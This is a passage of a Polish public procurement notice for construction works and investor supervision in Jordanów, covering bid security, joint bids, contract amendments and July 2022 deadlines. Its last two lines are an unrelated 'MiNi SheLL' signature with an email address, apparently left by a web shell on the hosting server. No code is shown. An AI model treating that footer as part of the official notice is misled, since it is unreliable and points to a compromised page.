pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego. <br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania: <br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie Pzp <br/>2) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium; <br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie; <br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania; <br/>6) beneficjentem poręczenia lub gwarancji jest: Miasto Jordanów. <br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 Pzp), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum); <br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Pzp zostanie odrzucona. <br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 Pzp <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zgodnie z art. 117 ust. 4 ustawy Pzp dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane jedynie w formie pisemnej w postaci aneksu do umowy podpisanego przez obydwie strony, pod rygorem nieważności. <br/>2. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem art. 455 p.z.p., postanowień niniejszego paragrafu, jak również art.15r Ustawy z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (t.j. Dz. U. poz. 1842 z późn. zm.), <br/>3. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych poniżej, w zakresie: <br/>1) zmiany terminu realizacji przedmiotu umowy spowodowanej: <br/>a) warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów lub inne czynniki zewnętrzne i niemożliwe do przewidzenia wydarzenia które będą miały wpływ na termin realizacji umowy; <br/>b) zmianami będącymi następstwem działania organów administracji, w szczególności: <br/>– przekroczeniem zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, uzgodnień itp., <br/>– odmową wydania przez organy administracji wymaganych decyzji, zezwoleń, <br/>– zmianą przepisów powodujących uzyskanie dokumentów, które te przepisy narzucają lub powodujących konieczność innych rozwiązań niż zakładano w opisie przedmiotu zamówienia; <br/>c) klęskami żywiołowymi; <br/>d) odmiennym, od przyjętych w dokumentacji technicznej, stanem istniejącym remontowanej / przebudowywanej konstrukcji - możliwym do stwierdzenia dopiero po odkopaniu / odsłonięciu, a skutkującym korektami w projekcie. <br/>2) zmian osobowych: <br/>a) zmiana albo rezygnacja z podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot umowy, jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się na zasadach określonych w art. 118 ust. 1 ustawy Prawo zamówień publicznych w celu wykazania spełniania warunków udziału w postępowaniu lub kryteriów selekcji Wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca lub Wykonawca samodzielnie wypełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia; <br/>b) rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy; <br/>c) zmiana osób (...) pozostałe, o których mowa w paragrafie 21 Załącznika nr 8 a do SWZ Projektowane Postanowienia Umowy oraz o których mowa w paragrafie 10 Załącznika nr 8 a i b do SWZ Projektowane Postanowienia Umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z wymaganymi załącznikami za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-13 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Wykonawca może złożyć ofertę na jedna, dwie lub na wszystkie części dotyczące robót budowlanych( część 1-3). Jednocześnie wykonawca składający ofertę/ oferty na roboty budowlane nie może złożyć oferty na część 4 dotyczącą nadzoru inwestorskiego. Wykonawca składając ofertę na część 4 dotyczącą nadzoru inwestorskiego nie może złożyć żadnej oferty na roboty budowlane w niniejszym postepowaniu.<br/>2. Zamawiający może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki publiczne, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane.

Creat By MiNi SheLL
Email: jattceo@gmail.com